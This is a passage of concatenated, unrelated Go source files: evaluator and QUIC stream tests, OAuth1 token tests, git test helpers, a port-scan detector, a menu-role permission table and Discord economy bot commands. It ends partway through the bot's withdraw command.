			Name:       "Test Parameter",
			Expression: "${PARAM1 > PARAM2}",
			Parameters: map[string]interface{}{
				"PARAM1": 10,
				"PARAM2": 20,
			},
			Expected: false,
		},
		{
			// Same expression as above but with no parameters supplied.
			Name:       "Test Invalid expresion",
			Expression: "${PARAM1 > PARAM2}",
			Expected:   "No parameter 'PARAM1' found",
			ErrorCase:  true,
		},
		{
			Name:       "Test invalid expression",
			Expression: "( 10 > 5",
			Expected:   "Unbalanced parenthesis",
			ErrorCase:  true,
		},
	}
	RunEvaluationTests(evaluationTests, nil, test)
}
// RunEvaluationTests runs each EvaluationTest case: it builds an evaluator,
// evaluates the expression, and compares the result (or, for ErrorCase tests,
// checks the error message contains the expected substring).
// definitionsList may be nil.
func RunEvaluationTests(evaluationTests []EvaluationTest, definitionsList []Definitions, test *testing.T) {
	fmt.Printf("Running %d evaluation test cases...\n", len(evaluationTests))
	for _, evaluationTest := range evaluationTests {
		evaluator, err := NewEvaluator(
			evaluationTest.Name,
			evaluationTest.Parameters,
			definitionsList,
		)
		// Previously this error was silently discarded; a nil evaluator would
		// then panic on Evaluate below. Fail the case explicitly instead.
		if err != nil {
			test.Logf("Test '%s' failed", evaluationTest.Name)
			test.Logf("Creating evaluator failed: %s", err.Error())
			test.Fail()
			continue
		}
		result, err := evaluator.Evaluate(evaluationTest.Expression)
		if err != nil {
			if evaluationTest.ErrorCase {
				// Error cases match on a substring of the error message.
				if !strings.Contains(err.Error(), evaluationTest.Expected.(string)) {
					test.Logf("Test '%s' failed", evaluationTest.Name)
					test.Logf("Evaluation error '%v' does not match expected: '%v'", err.Error(),
						evaluationTest.Expected)
					test.Fail()
				}
			} else {
				test.Logf("Test '%s' failed", evaluationTest.Name)
				test.Logf("Encountered error: %s", err.Error())
				test.Fail()
			}
			continue
		}
		if result != evaluationTest.Expected {
			test.Logf("Test '%s' failed", evaluationTest.Name)
			test.Logf("Evaluation result '%v' does not match expected: '%v'", result, evaluationTest.Expected)
			test.Fail()
		}
	}
}
|
package greet
import "fmt"
// SayHello prints a fixed greeting to standard output.
func SayHello() {
	fmt.Println("Hello !")
}
// Greet builds and returns a greeting string addressed to name.
func Greet(name string) string {
	greeting := fmt.Sprintf("Hello %s", name)
	return greeting
}
|
package quic
import (
"errors"
"github.com/golang/mock/gomock"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"gx/ipfs/QmU44KWVkSHno7sNDTeUcL4FBgxgoidkFuTUyTXWJPXXFJ/quic-go/internal/protocol"
"gx/ipfs/QmU44KWVkSHno7sNDTeUcL4FBgxgoidkFuTUyTXWJPXXFJ/quic-go/internal/wire"
"gx/ipfs/QmU44KWVkSHno7sNDTeUcL4FBgxgoidkFuTUyTXWJPXXFJ/quic-go/qerr"
)
// Ginkgo suite for the outgoing streams map: opening/getting/deleting
// streams, close behaviour, and the MAX_STREAM_ID / STREAM_ID_BLOCKED
// flow-control interactions. Stream IDs advance in steps of 4.
var _ = Describe("Streams Map (outgoing)", func() {
	const firstNewStream protocol.StreamID = 10
	var (
		m          *outgoingItemsMap
		newItem    func(id protocol.StreamID) item
		mockSender *MockStreamSender
	)
	BeforeEach(func() {
		newItem = func(id protocol.StreamID) item {
			return &mockGenericStream{id: id}
		}
		mockSender = NewMockStreamSender(mockCtrl)
		m = newOutgoingItemsMap(firstNewStream, newItem, mockSender.queueControlFrame)
	})
	Context("no stream ID limit", func() {
		BeforeEach(func() {
			// Effectively unlimited; the tests below never reach this ID.
			m.SetMaxStream(0xffffffff)
		})
		It("opens streams", func() {
			str, err := m.OpenStream()
			Expect(err).ToNot(HaveOccurred())
			Expect(str.(*mockGenericStream).id).To(Equal(firstNewStream))
			str, err = m.OpenStream()
			Expect(err).ToNot(HaveOccurred())
			Expect(str.(*mockGenericStream).id).To(Equal(firstNewStream + 4))
		})
		It("doesn't open streams after it has been closed", func() {
			testErr := errors.New("close")
			m.CloseWithError(testErr)
			_, err := m.OpenStream()
			Expect(err).To(MatchError(testErr))
		})
		It("gets streams", func() {
			_, err := m.OpenStream()
			Expect(err).ToNot(HaveOccurred())
			str, err := m.GetStream(firstNewStream)
			Expect(err).ToNot(HaveOccurred())
			Expect(str.(*mockGenericStream).id).To(Equal(firstNewStream))
		})
		It("errors when trying to get a stream that has not yet been opened", func() {
			_, err := m.GetStream(10)
			Expect(err).To(MatchError(qerr.Error(qerr.InvalidStreamID, "peer attempted to open stream 10")))
		})
		It("deletes streams", func() {
			_, err := m.OpenStream() // opens stream 10
			Expect(err).ToNot(HaveOccurred())
			err = m.DeleteStream(10)
			Expect(err).ToNot(HaveOccurred())
			// Getting a deleted (but once-opened) stream yields nil, no error.
			str, err := m.GetStream(10)
			Expect(err).ToNot(HaveOccurred())
			Expect(str).To(BeNil())
		})
		It("errors when deleting a non-existing stream", func() {
			err := m.DeleteStream(1337)
			Expect(err).To(MatchError("Tried to delete unknown stream 1337"))
		})
		It("errors when deleting a stream twice", func() {
			_, err := m.OpenStream() // opens stream 10
			Expect(err).ToNot(HaveOccurred())
			err = m.DeleteStream(10)
			Expect(err).ToNot(HaveOccurred())
			err = m.DeleteStream(10)
			Expect(err).To(MatchError("Tried to delete unknown stream 10"))
		})
		It("closes all streams when CloseWithError is called", func() {
			str1, err := m.OpenStream()
			Expect(err).ToNot(HaveOccurred())
			str2, err := m.OpenStream()
			Expect(err).ToNot(HaveOccurred())
			testErr := errors.New("test err")
			m.CloseWithError(testErr)
			Expect(str1.(*mockGenericStream).closed).To(BeTrue())
			Expect(str1.(*mockGenericStream).closeErr).To(MatchError(testErr))
			Expect(str2.(*mockGenericStream).closed).To(BeTrue())
			Expect(str2.(*mockGenericStream).closeErr).To(MatchError(testErr))
		})
	})
	Context("with stream ID limits", func() {
		// No SetMaxStream call here, so the map starts out fully blocked.
		It("errors when no stream can be opened immediately", func() {
			mockSender.EXPECT().queueControlFrame(gomock.Any())
			_, err := m.OpenStream()
			Expect(err).To(MatchError(qerr.TooManyOpenStreams))
		})
		It("blocks until a stream can be opened synchronously", func() {
			mockSender.EXPECT().queueControlFrame(gomock.Any())
			done := make(chan struct{})
			go func() {
				defer GinkgoRecover()
				str, err := m.OpenStreamSync()
				Expect(err).ToNot(HaveOccurred())
				Expect(str.(*mockGenericStream).id).To(Equal(firstNewStream))
				close(done)
			}()
			Consistently(done).ShouldNot(BeClosed())
			m.SetMaxStream(firstNewStream)
			Eventually(done).Should(BeClosed())
		})
		It("stops opening synchronously when it is closed", func() {
			mockSender.EXPECT().queueControlFrame(gomock.Any())
			testErr := errors.New("test error")
			done := make(chan struct{})
			go func() {
				defer GinkgoRecover()
				_, err := m.OpenStreamSync()
				Expect(err).To(MatchError(testErr))
				close(done)
			}()
			Consistently(done).ShouldNot(BeClosed())
			m.CloseWithError(testErr)
			Eventually(done).Should(BeClosed())
		})
		It("doesn't reduce the stream limit", func() {
			m.SetMaxStream(firstNewStream)
			m.SetMaxStream(firstNewStream - 4)
			str, err := m.OpenStream()
			Expect(err).ToNot(HaveOccurred())
			Expect(str.(*mockGenericStream).id).To(Equal(firstNewStream))
		})
		It("queues a STREAM_ID_BLOCKED frame if no stream can be opened", func() {
			m.SetMaxStream(firstNewStream)
			mockSender.EXPECT().queueControlFrame(&wire.StreamIDBlockedFrame{StreamID: firstNewStream})
			_, err := m.OpenStream()
			Expect(err).ToNot(HaveOccurred())
			_, err = m.OpenStream()
			Expect(err).To(MatchError(qerr.TooManyOpenStreams))
		})
		It("only sends one STREAM_ID_BLOCKED frame for one stream ID", func() {
			m.SetMaxStream(firstNewStream)
			mockSender.EXPECT().queueControlFrame(&wire.StreamIDBlockedFrame{StreamID: firstNewStream})
			_, err := m.OpenStream()
			Expect(err).ToNot(HaveOccurred())
			// try to open a stream twice, but expect only one STREAM_ID_BLOCKED to be sent
			_, err = m.OpenStream()
			Expect(err).To(MatchError(qerr.TooManyOpenStreams))
			_, err = m.OpenStream()
			Expect(err).To(MatchError(qerr.TooManyOpenStreams))
		})
	})
})
|
package telemetry
import (
"testing"
"github.com/stretchr/testify/assert"
)
// Test_ServiceName verifies that ServiceName maps a services option string to
// the expected telemetry service name (empty/"all" fall back to "pomerium").
func Test_ServiceName(t *testing.T) {
	t.Parallel()
	tests := []struct {
		name        string
		servicesOpt string
		want        string
	}{
		{"all", "all", "pomerium"},
		{"proxy", "proxy", "pomerium-proxy"},
		{"missing", "", "pomerium"},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			assert.Equal(t, tt.want, ServiceName(tt.servicesOpt))
		})
	}
}
|
package master
// InitMaster initializes the master from the given file path.
// NOTE(review): currently a stub — filePath is ignored and nil is always
// returned; confirm whether real initialization is still pending.
func InitMaster(filePath string) error {
	return nil
}
|
package permission
// MenuRole maps one menu identifier to the roles allowed to access it.
type MenuRole struct {
	Menu  string   `json:"menu"`
	Roles []string `json:"roles"`
}
// UserMenu lists the menus visible to a user within one project.
type UserMenu struct {
	ProjectName string   `json:"projectName"`
	ProjectId   string   `json:"projectId"`
	Menus       []string `json:"menus"`
}
// MenuRoles is the default menu→role assignment table, embedded as a JSON
// document that unmarshals into []MenuRole. Menus listed with an empty
// "roles" array carry no role restriction here — presumably reserved for
// admin-only handling by the consumer; TODO confirm.
var MenuRoles = `
[
  {
    "menu": "PROJECT",
    "roles": [
      "PROJECT_MANAGER",
      "CLUSTER_MANAGER"
    ]
  },
  {
    "menu": "PROJECT-MEMBER",
    "roles": [
      "PROJECT_MANAGER"
    ]
  },
  {
    "menu": "PROJECT-RESOURCE",
    "roles": [
      "PROJECT_MANAGER"
    ]
  },
  {
    "menu": "CLUSTER",
    "roles": [
      "PROJECT_MANAGER",
      "CLUSTER_MANAGER"
    ]
  },
  {
    "menu": "CLUSTER-OVERVIEW",
    "roles": [
      "CLUSTER_MANAGER",
      "PROJECT_MANAGER"
    ]
  },
  {
    "menu": "CLUSTER-NODE",
    "roles": [
      "CLUSTER_MANAGER",
      "PROJECT_MANAGER"
    ]
  },
  {
    "menu": "CLUSTER-NAMESPACE",
    "roles": [
      "CLUSTER_MANAGER",
      "PROJECT_MANAGER"
    ]
  },
  {
    "menu": "CLUSTER-STORAGE",
    "roles": [
      "CLUSTER_MANAGER",
      "PROJECT_MANAGER"
    ]
  },
  {
    "menu": "CLUSTER-LOGGING",
    "roles": [
      "CLUSTER_MANAGER",
      "PROJECT_MANAGER"
    ]
  },
  {
    "menu": "CLUSTER-MONITOR",
    "roles": [
      "CLUSTER_MANAGER",
      "PROJECT_MANAGER"
    ]
  },
  {
    "menu": "CLUSTER-CATALOG",
    "roles": [
      "CLUSTER_MANAGER",
      "PROJECT_MANAGER"
    ]
  },
  {
    "menu": "CLUSTER-REPOSITORY",
    "roles": [
      "CLUSTER_MANAGER",
      "PROJECT_MANAGER"
    ]
  },
  {
    "menu": "CLUSTER-REPOSITORY-CHARTMUSEUM",
    "roles": [
      "CLUSTER_MANAGER",
      "PROJECT_MANAGER"
    ]
  },
  {
    "menu": "CLUSTER-REPOSITORY-REGISTRY",
    "roles": [
      "CLUSTER_MANAGER",
      "PROJECT_MANAGER"
    ]
  },
  {
    "menu": "CLUSTER-TOOL",
    "roles": [
      "CLUSTER_MANAGER",
      "PROJECT_MANAGER"
    ]
  },
  {
    "menu": "CLUSTER-DASHBOARD",
    "roles": [
      "CLUSTER_MANAGER",
      "PROJECT_MANAGER"
    ]
  },
  {
    "menu": "HOST",
    "roles": [
    ]
  },
  {
    "menu": "SETTING",
    "roles": [
    ]
  },
  {
    "menu": "SETTING-SYSTEM",
    "roles": [
    ]
  },
  {
    "menu": "SETTING-CREDENTIAL",
    "roles": [
    ]
  },
  {
    "menu": "DEPLOY",
    "roles": [
    ]
  },
  {
    "menu": "DEPLOY-REGION",
    "roles": [
    ]
  },
  {
    "menu": "DEPLOY-ZONE",
    "roles": [
    ]
  },
  {
    "menu": "DEPLOY-PLAN",
    "roles": [
    ]
  },
  {
    "menu": "USER",
    "roles": [
    ]
  }
]
`
|
package oauth1
import (
"net/url"
"strconv"
"testing"
)
// Test the ability to parse a URL query string and unmarshal to a RequestToken.
func TestParseRequestTokenStr(t *testing.T) {
	oauth_token := "c0cf8793d39d46ab"
	oauth_token_secret := "FMMj3w7plPEyhK8ZZ9lBsp"
	oauth_callback_confirmed := true
	values := url.Values{}
	values.Set("oauth_token", oauth_token)
	values.Set("oauth_token_secret", oauth_token_secret)
	values.Set("oauth_callback_confirmed", strconv.FormatBool(oauth_callback_confirmed))
	token, err := ParseRequestTokenStr(values.Encode())
	if err != nil {
		t.Errorf("Expected Request Token parsed, got Error %s", err.Error())
	}
	if token.token != oauth_token {
		t.Errorf("Expected Request Token %v, got %v", oauth_token, token.token)
	}
	if token.secret != oauth_token_secret {
		t.Errorf("Expected Request Token Secret %v, got %v", oauth_token_secret, token.secret)
	}
	// NOTE(review): oauth_callback_confirmed is set on the input but never
	// asserted on the parsed token.
}
// Test the ability to Encode a RequestToken to a URL query string.
// NOTE(review): the expected string assumes Encode emits the fields in this
// exact order — confirm Encode's output ordering is deterministic.
func TestEncodeRequestToken(t *testing.T) {
	token := RequestToken{
		token:             "c0cf8793d39d46ab",
		secret:            "FMMj3w7plPEyhK8ZZ9lBsp",
		callbackConfirmed: true,
	}
	tokenStr := token.Encode()
	expectedStr := "oauth_token_secret=FMMj3w7plPEyhK8ZZ9lBsp&oauth_token=c0cf8793d39d46ab&oauth_callback_confirmed=true"
	if tokenStr != expectedStr {
		t.Errorf("Expected Request Token Encoded as %v, got %v", expectedStr, tokenStr)
	}
}
// Test the ability to parse a URL query string and unmarshal to an AccessToken.
// NOTE(review): the function name says "Encode" but the body exercises
// ParseAccessTokenStr — consider renaming to TestParseAccessTokenStr.
func TestEncodeAccessTokenStr(t *testing.T) {
	oauth_token := "c0cf8793d39d46ab"
	oauth_token_secret := "FMMj3w7plPEyhK8ZZ9lBsp"
	oauth_callback_confirmed := true
	values := url.Values{}
	values.Set("oauth_token", oauth_token)
	values.Set("oauth_token_secret", oauth_token_secret)
	values.Set("oauth_callback_confirmed", strconv.FormatBool(oauth_callback_confirmed))
	token, err := ParseAccessTokenStr(values.Encode())
	if err != nil {
		t.Errorf("Expected Access Token parsed, got Error %s", err.Error())
	}
	if token.token != oauth_token {
		t.Errorf("Expected Access Token %v, got %v", oauth_token, token.token)
	}
	if token.secret != oauth_token_secret {
		t.Errorf("Expected Access Token Secret %v, got %v", oauth_token_secret, token.secret)
	}
}
// Test the ability to Encode an AccessToken to a URL query string.
// NOTE(review): params is a map, and the expected string pins "user" first —
// confirm Encode orders extra params deterministically.
func TestEncodeAccessToken(t *testing.T) {
	token := AccessToken{
		token:  "c0cf8793d39d46ab",
		secret: "FMMj3w7plPEyhK8ZZ9lBsp",
		params: map[string]string{"user": "dr_van_nostrand"},
	}
	tokenStr := token.Encode()
	expectedStr := "user=dr_van_nostrand&oauth_token_secret=FMMj3w7plPEyhK8ZZ9lBsp&oauth_token=c0cf8793d39d46ab"
	if tokenStr != expectedStr {
		t.Errorf("Expected Access Token Encoded as %v, got %v", expectedStr, tokenStr)
	}
}
|
package array
import (
"fmt"
"testing"
)
// TestRotate rotates a sample 4x4 matrix and prints the result for manual
// inspection. NOTE(review): no assertion is made on the rotated output.
func TestRotate(t *testing.T) {
	//source := [][]int { { 1,2,3 } , { 4,5,6 } , { 7,8,9 }}
	source := [][]int{{5, 1, 9, 11}, {2, 4, 8, 10}, {13, 3, 6, 7}, {15, 14, 12, 16}}
	Rotate(source)
	fmt.Println(source)
}
// Rotate rotates the square matrix 90 degrees clockwise, in place.
// It walks each concentric ring once; for every starting cell the four cells
// of its rotation cycle are exchanged with a single parallel assignment, so
// no extra storage is needed.
func Rotate(matrix [][]int) {
	n := len(matrix)
	for ring := 0; ring < n/2; ring++ {
		for col := ring; col < n-1-ring; col++ {
			i, j := ring, col
			// Clockwise mapping: (i,j) -> (j, n-1-i), applied to all four
			// cells of the cycle at once.
			matrix[i][j], matrix[j][n-1-i], matrix[n-1-i][n-1-j], matrix[n-1-j][i] =
				matrix[n-1-j][i], matrix[i][j], matrix[j][n-1-i], matrix[n-1-i][n-1-j]
		}
	}
}
|
package test
import (
"fmt"
"git-get/pkg/run"
"io/ioutil"
"os"
"path/filepath"
"testing"
)
// TempDir creates a temporary directory inside the parent dir.
// If parent is empty, it will use a system default temp dir (usually /tmp).
// The directory is removed automatically when the test finishes.
// NOTE(review): ioutil.TempDir is deprecated in favour of os.MkdirTemp —
// switch once the module's minimum Go version allows it.
func TempDir(t *testing.T, parent string) string {
	dir, err := ioutil.TempDir(parent, "git-get-repo-")
	checkFatal(t, err)
	// Automatically remove temp dir when the test is over.
	t.Cleanup(func() {
		err := os.RemoveAll(dir)
		if err != nil {
			t.Errorf("failed removing test repo %s", dir)
		}
	})
	return dir
}
// init creates an empty git repository at the repo's path.
func (r *Repo) init() {
	err := run.Git("init", "--quiet", r.path).AndShutUp()
	checkFatal(r.t, err)
}
// writeFile writes the content string into a file inside the repo.
// If the file doesn't exist it is created; existing content is truncated.
func (r *Repo) writeFile(filename string, content string) {
	path := filepath.Join(r.path, filename)
	file, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0644)
	checkFatal(r.t, err)
	_, err = file.Write([]byte(content))
	checkFatal(r.t, err)
	// Close the handle (previously leaked) so the descriptor is released
	// before subsequent git commands touch the file.
	checkFatal(r.t, file.Close())
}
// stageFile adds the given path to the git index.
func (r *Repo) stageFile(path string) {
	err := run.Git("add", path).OnRepo(r.path).AndShutUp()
	checkFatal(r.t, err)
}

// commit records the staged changes with a fixed test author identity.
func (r *Repo) commit(msg string) {
	err := run.Git("commit", "-m", fmt.Sprintf("%q", msg), "--author=\"user <user@example.com>\"").OnRepo(r.path).AndShutUp()
	checkFatal(r.t, err)
}

// branch creates a new branch without switching to it.
func (r *Repo) branch(name string) {
	err := run.Git("branch", name).OnRepo(r.path).AndShutUp()
	checkFatal(r.t, err)
}

// tag creates an annotated tag whose message equals its name.
func (r *Repo) tag(name string) {
	err := run.Git("tag", "-a", name, "-m", name).OnRepo(r.path).AndShutUp()
	checkFatal(r.t, err)
}

// checkout switches the work tree to the given branch, tag or commit.
func (r *Repo) checkout(name string) {
	err := run.Git("checkout", name).OnRepo(r.path).AndShutUp()
	checkFatal(r.t, err)
}
// clone clones this repository (over the local file:// protocol) into a fresh
// temp dir and returns the clone as a new Repo sharing the same *testing.T.
func (r *Repo) clone() *Repo {
	dir := TempDir(r.t, "")
	url := fmt.Sprintf("file://%s/.git", r.path)
	err := run.Git("clone", url, dir).AndShutUp()
	checkFatal(r.t, err)
	clone := &Repo{
		path: dir,
		t:    r.t,
	}
	return clone
}
// fetch updates all remotes of the repository.
func (r *Repo) fetch() {
	err := run.Git("fetch", "--all").OnRepo(r.path).AndShutUp()
	checkFatal(r.t, err)
}
// checkFatal aborts the test immediately when err is non-nil; used by all
// repo helpers so individual call sites stay one-liners.
func checkFatal(t *testing.T, err error) {
	if err != nil {
		t.Fatalf("failed making test repo: %+v", err)
	}
}
|
package worder
// History records one order status entry for a user.
type History struct {
	UserID  string // owning user's identifier
	OrderID string // order the status applies to
	// StatusID is a numeric status code; its value semantics are defined by
	// the consumer — TODO confirm.
	StatusID uint64
}
|
package ast
// Node is a generic representation of an element in the SQL AST.
// Every AST element renders itself to SQL text via BuildQuery.
type Node interface {
	// BuildQuery creates a valid SQL query from the AST node.
	BuildQuery() string
}
|
package connrt
import (
"fmt"
"sort"
"strconv"
"strings"
"time"
"github.com/gookit/event"
"github.com/kbence/conndetect/internal/connlib"
"github.com/kbence/conndetect/internal/utils"
)
// ExpiringConnection is a directional connection annotated with the time
// after which it no longer counts toward port-scan detection.
type ExpiringConnection struct {
	connlib.DirectionalConnection
	ExpiresAt time.Time
}

// ExpiringConnectionList is a slice of ExpiringConnection values.
type ExpiringConnectionList []ExpiringConnection

// UniqueConnectionKey identifies a source→destination host pair.
// Ports are excluded on purpose: all connections between the same two hosts
// share one key so their destination ports can be counted together.
func UniqueConnectionKey(c connlib.DirectionalConnection) string {
	return fmt.Sprintf("%s>%s", c.Source.IP.String(), c.Destination.IP.String())
}
// PortMap tracks, per destination port, the most recent connection seen on it.
type PortMap map[uint16]ExpiringConnection

// GetSortedPorts returns the map's port numbers in ascending order.
func (m *PortMap) GetSortedPorts() []int {
	// Pre-size the slice to avoid repeated growth while collecting keys.
	ports := make([]int, 0, len(*m))
	for port := range *m {
		ports = append(ports, int(port))
	}
	sort.Ints(ports)
	return ports
}
// PortscanSettings holds the thresholds used by the port-scan detector.
type PortscanSettings struct {
	MaxPorts int           // distinct ports that trigger a report
	Interval time.Duration // how long a seen port stays counted
}

// NewPortscanSettings builds a PortscanSettings from the given limits.
func NewPortscanSettings(maxPorts int, period time.Duration) *PortscanSettings {
	settings := new(PortscanSettings)
	settings.MaxPorts = maxPorts
	settings.Interval = period
	return settings
}
// PortscanDetector listens for new connections and prints a report when one
// source hits many distinct ports on a destination within the configured
// interval.
type PortscanDetector struct {
	Node
	printer  utils.Printer
	time     utils.Time
	settings *PortscanSettings
	// connectionLog maps a "src>dst" key to the ports seen (with expiry).
	connectionLog map[string]PortMap
	// scanReported is a set of keys already reported, to avoid duplicates.
	scanReported map[string]interface{}
}
// NewPortscanDetector builds a detector with real printer/clock dependencies
// and subscribes its Handle method to the "newConnection" event.
func NewPortscanDetector(eventManager event.ManagerFace, settings *PortscanSettings) *PortscanDetector {
	detector := &PortscanDetector{
		Node:          Node{eventManager: eventManager},
		printer:       utils.NewPrinter(),
		time:          utils.NewTime(),
		settings:      settings,
		connectionLog: map[string]PortMap{},
		scanReported:  map[string]interface{}{},
	}
	eventManager.On("newConnection", event.ListenerFunc(detector.Handle))
	return detector
}
// Handle is the "newConnection" event listener. It records the connection's
// destination port and reports a scan once the number of distinct, unexpired
// ports for the source→destination pair reaches MaxPorts.
func (d *PortscanDetector) Handle(e event.Event) error {
	var connection *connlib.DirectionalConnection = nil
	if connObj := e.Get("connection"); connObj != nil {
		switch conn := connObj.(type) {
		case connlib.DirectionalConnection:
			connection = &conn
		}
	}
	// Do nothing when the event carries no usable connection payload.
	if connection == nil {
		return nil
	}
	d.saveConnection(connection)
	// saveConnection guarantees an entry exists, so portMap is non-nil here.
	portMap := d.findPortMap(connection)
	if len(*portMap) >= d.settings.MaxPorts {
		d.reportScan(connection, portMap)
	}
	return nil
}
// reportScan prints a single port-scan report for the connection's host pair;
// repeat detections for the same pair are suppressed via scanReported.
func (d *PortscanDetector) reportScan(connection *connlib.DirectionalConnection, portMap *PortMap) {
	connectionKey := UniqueConnectionKey(*connection)
	if _, found := d.scanReported[connectionKey]; found {
		return
	}
	ports := []string{}
	for _, port := range portMap.GetSortedPorts() {
		ports = append(ports, strconv.Itoa(port))
	}
	// TIME_FORMAT is a package-level layout constant defined elsewhere.
	d.printer.Printf(
		"%s: Port scan detected: %s -> %s on ports %s\n",
		d.time.Now().Format(TIME_FORMAT),
		connection.Source.IP.String(),
		connection.Destination.IP.String(),
		strings.Join(ports, ","),
	)
	d.scanReported[connectionKey] = nil
}
// findPortMap returns the PortMap recorded for the connection's host pair,
// or nil when no connection for that pair has been saved yet.
func (d *PortscanDetector) findPortMap(connection *connlib.DirectionalConnection) *PortMap {
	if portMap, found := d.connectionLog[UniqueConnectionKey(*connection)]; found {
		// Taking the address of the local copy is safe: maps are reference
		// types, so it still aliases the stored map.
		return &portMap
	}
	return nil
}
// saveConnection records the connection's destination port under its host-pair
// key, stamping it with an expiry of now + Interval, and opportunistically
// evicts expired ports for that key.
func (d *PortscanDetector) saveConnection(connection *connlib.DirectionalConnection) {
	expiringConn := ExpiringConnection{
		DirectionalConnection: *connection,
		ExpiresAt:             d.time.Now().Add(d.settings.Interval),
	}
	connectionKey := UniqueConnectionKey(*connection)
	if _, found := d.connectionLog[connectionKey]; !found {
		d.connectionLog[connectionKey] = PortMap{}
	}
	// let's do some lazy cleanup
	d.cleanUpConnection(connectionKey)
	d.connectionLog[connectionKey][expiringConn.Destination.Port] = expiringConn
}
// cleanUpConnection rebuilds the PortMap for the given key, keeping only
// entries that have not yet expired at the current (injected) clock time.
func (d *PortscanDetector) cleanUpConnection(connectionKey string) {
	newPortMap := PortMap{}
	for _, conn := range d.connectionLog[connectionKey] {
		if d.time.Now().Before(conn.ExpiresAt) {
			newPortMap[conn.Destination.Port] = conn
		}
	}
	d.connectionLog[connectionKey] = newPortMap
}
|
package discord
import (
"fmt"
"strconv"
"strings"
"time"
"github.com/bwmarrin/discordgo"
)
// Reaction emoji used for leaderboard pagination.
const leftArrow = "⬅️"
const rightArrow = "➡️"

// reactionMsg associates a message with its reaction handler and per-message
// state (e.g. current page and total row count for paginated embeds).
type reactionMsg struct {
	Type     reactionMsgType
	Metadata map[string]interface{}
	Handler  func(*discordgo.MessageReactionAdd)
}
// ldbPageSwitcher handles leftArrow/rightArrow reactions on a leaderboard
// message: it computes the requested page, re-queries the wallet leaderboard
// for the guild, and edits the embed in place.
func (b *Bot) ldbPageSwitcher(r *discordgo.MessageReactionAdd) {
	pg := b.pages[r.MessageID]
	var page int
	if r.Emoji.Name == leftArrow {
		page = pg.Metadata["page"].(int) - 1
	} else {
		page = pg.Metadata["page"].(int) + 1
	}
	// Out of range: remove the user's reaction and keep the current page.
	if ((page * 10) > pg.Metadata["count"].(int)) || (page < 0) {
		b.dg.MessageReactionRemove(r.ChannelID, r.MessageID, r.Emoji.Name, r.UserID)
		b.pages[r.MessageID] = pg
		return
	}
	pg.Metadata["page"] = page
	// Wallet leaderboard for this guild, 10 rows per page.
	res, err := b.db.Query("SELECT user, wallet FROM currency WHERE guilds LIKE ? ORDER BY wallet DESC LIMIT 10 OFFSET ?", "%"+r.GuildID+"%", page*10)
	if err != nil {
		// NOTE(review): errors bail out silently here, after the shared
		// Metadata map has already been mutated — confirm this is intended.
		return
	}
	defer res.Close()
	var ldb string
	var user string
	var wallet int
	var usr *discordgo.User
	// Ranks continue across pages: page N starts at rank N*10 + 1.
	i := 1 + (page * 10)
	for res.Next() {
		err = res.Scan(&user, &wallet)
		if err != nil {
			return
		}
		usr, err = b.dg.User(user)
		if err != nil {
			return
		}
		ldb += fmt.Sprintf("%d. %s#%s - %d\n", i, usr.Username, usr.Discriminator, wallet)
		i++
	}
	gld, err := b.dg.Guild(r.GuildID)
	if err != nil {
		return
	}
	b.dg.ChannelMessageEditEmbed(r.ChannelID, r.MessageID, &discordgo.MessageEmbed{
		Title:       fmt.Sprintf("Richest users in %s", gld.Name),
		Description: ldb,
	})
	b.dg.MessageReactionRemove(r.ChannelID, r.MessageID, r.Emoji.Name, r.UserID)
	b.pages[r.MessageID] = pg
}
// currencyBasics implements the basic economy commands — daily, bal, dep,
// with, ldb, credup and donate — dispatched by message prefix. Messages from
// the bot itself or from other bots are ignored.
func (b *Bot) currencyBasics(s *discordgo.Session, m *discordgo.MessageCreate) {
	if m.Author.ID == s.State.User.ID || m.Author.Bot {
		return
	}
	// "daily": grant 2500 coins at most once per 24 hours.
	if b.startsWith(m, "daily") {
		b.checkuser(m)
		user, success := b.getuser(m, m.Author.ID)
		if !success {
			return
		}
		_, exists := user.Metadata["lastdaily"]
		if !exists {
			user.Metadata["lastdaily"] = time.Now().Unix()
		} else {
			// Stored as int64 but read back as float64 — presumably because
			// Metadata round-trips through JSON; confirm against storage.
			diff := time.Now().Unix() - int64(user.Metadata["lastdaily"].(float64))
			if (diff) < 86400 { // less than a day
				s.ChannelMessageSend(m.ChannelID, fmt.Sprintf("You still need to wait %0.2f hours.", 24-(float32(diff)/3600)))
				return
			}
		}
		user.Wallet += 2500
		user.Metadata["lastdaily"] = time.Now().Unix()
		success = b.updateuser(m, user)
		if !success {
			return
		}
		s.ChannelMessageSend(m.ChannelID, "Congrats on the 2,500 coins! Come back in 24 hours to get more!")
		return
	}
	// "bal": report wallet/bank/credit for the author or a mentioned user.
	if b.startsWith(m, "bal") {
		b.checkuser(m)
		id := m.Author.ID
		person := "You have"
		describer := "your"
		if len(m.Mentions) > 0 {
			id = m.Mentions[0].ID
			b.checkuserwithid(m, id)
			person = "<@" + id + "> has"
			describer = "their"
		}
		user, success := b.getuser(m, id)
		if !success {
			return
		}
		s.ChannelMessageSend(m.ChannelID, fmt.Sprintf("%s %d coins in %s wallet and %d coins in the bank. %s credit is %d.", person, user.Wallet, describer, user.Bank, strings.Title(describer), user.Credit))
		return
	}
	// "dep": move coins from wallet to bank ("all" or an amount, capped at
	// the wallet balance).
	if b.startsWith(m, "dep") {
		b.checkuser(m)
		user, success := b.getuser(m, m.Author.ID)
		if !success {
			return
		}
		var dep string
		_, err := fmt.Sscanf(m.Content, "dep %s", &dep)
		if b.handle(err, m) {
			return
		}
		var num int
		if dep == "all" {
			num = user.Wallet
		} else {
			num, err = strconv.Atoi(dep)
			if b.handle(err, m) {
				return
			}
			num = b.abs(num)
		}
		if user.Wallet < num {
			num = user.Wallet
		}
		user.Bank += num
		user.Wallet -= num
		success = b.updateuser(m, user)
		if !success {
			return
		}
		s.ChannelMessageSend(m.ChannelID, fmt.Sprintf("Deposited %d coins.", num))
		return
	}
	// "with": move coins from bank to wallet (mirror of "dep").
	if b.startsWith(m, "with") {
		b.checkuser(m)
		user, success := b.getuser(m, m.Author.ID)
		if !success {
			return
		}
		var with string
		_, err := fmt.Sscanf(m.Content, "with %s", &with)
		if b.handle(err, m) {
			return
		}
		var num int
		if with == "all" {
			num = user.Bank
		} else {
			num, err = strconv.Atoi(with)
			if b.handle(err, m) {
				return
			}
			num = b.abs(num)
		}
		if user.Bank < num {
			num = user.Bank
		}
		user.Bank -= num
		user.Wallet += num
		success = b.updateuser(m, user)
		if !success {
			return
		}
